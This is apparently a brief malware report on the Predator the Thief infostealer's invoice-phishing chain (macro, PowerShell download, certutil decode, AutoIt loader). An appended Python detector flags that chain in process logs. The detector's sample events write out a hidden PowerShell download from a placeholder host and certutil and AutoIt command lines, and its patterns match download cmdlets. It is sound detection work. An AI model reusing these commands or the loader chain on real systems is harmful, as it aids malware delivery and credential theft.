A new release of the malware known as Predator the Thief has been observed, labeled version 3.3.4. Each minor version has introduced small development changes, and together they make this latest version very different from previous ones. It has been active since at least December 2019. The recent campaign uses phishing documents designed to look like invoices, all pushing the same Predator the Thief payload.
Infection chain of Predator the Thief
Once the document is opened the malware performs the following operations:
1. AutoOpen macro runs the malware VBA script.
2. It downloads three files through PowerShell.
3. It then uses a legitimate AutoIt3.exe to run the decoded AutoIt script.
“SevSS.data” is decoded by certutil.exe, a legitimate command-line program that is part of the Certificate Services in Windows. The decoded script is then run to decrypt apTz.dat into the Predator the Thief payload.
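As an added example (not from the article and not any vendor's tooling), the following Python sketches how a defender could flag the chain described above in process-creation telemetry: an Office parent spawning PowerShell with a download cmdlet, certutil.exe with -decode, and AutoIt3.exe. The sample events, the Public folder paths, the .au3 extension and the example.invalid host are constructed assumptions; only the file names SevSS.data and apTz.dat come from the article.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real telemetry). File names
# SevSS.data and apTz.dat are the ones the article names; paths/host are assumed.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE", "cmd": "WINWORD.EXE invoice.docm"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile("
            "'http://example.invalid/SevSS.data','C:\\Users\\Public\\SevSS.data')"},
    {"pid": 400, "ppid": 200, "image": "certutil.exe",
     "cmd": "certutil.exe -decode C:\\Users\\Public\\SevSS.data C:\\Users\\Public\\SevSS.au3"},
    {"pid": 500, "ppid": 200, "image": "AutoIt3.exe",
     "cmd": "AutoIt3.exe C:\\Users\\Public\\SevSS.au3 C:\\Users\\Public\\apTz.dat"},
    # Benign administrative use of certutil under explorer.exe: must not alert.
    {"pid": 600, "ppid": 100, "image": "certutil.exe", "cmd": "certutil.exe -verify cert.cer"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# (stage name, child image, command-line pattern or None) for each documented step.
STAGES = [
    ("powershell_download", "powershell.exe",
     re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"-decode\b", re.I)),
    ("autoit_runner", "autoit3.exe", None),  # any AutoIt3 child of Office is notable
]

def find_chains(events):
    """Map each Office process id to the chain stages seen among its children."""
    by_pid = {e["pid"]: e for e in events}
    chains = defaultdict(list)
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or parent["image"].lower() not in OFFICE_PARENTS:
            continue
        for stage, image, pattern in STAGES:
            if e["image"].lower() == image and (pattern is None or pattern.search(e["cmd"])):
                chains[parent["pid"]].append(stage)
    return dict(chains)

def should_alert(stages):
    """Require two distinct stages under one Office parent; certutil -decode alone is noisy."""
    return len(set(stages)) >= 2

def alerts(events):
    """Return Office process ids whose children match enough of the chain to alert."""
    return [pid for pid, stages in find_chains(events).items() if should_alert(stages)]
```

Running `alerts(SAMPLE_EVENTS)` flags only the WINWORD.EXE process (pid 200); the standalone certutil -verify under explorer.exe is ignored.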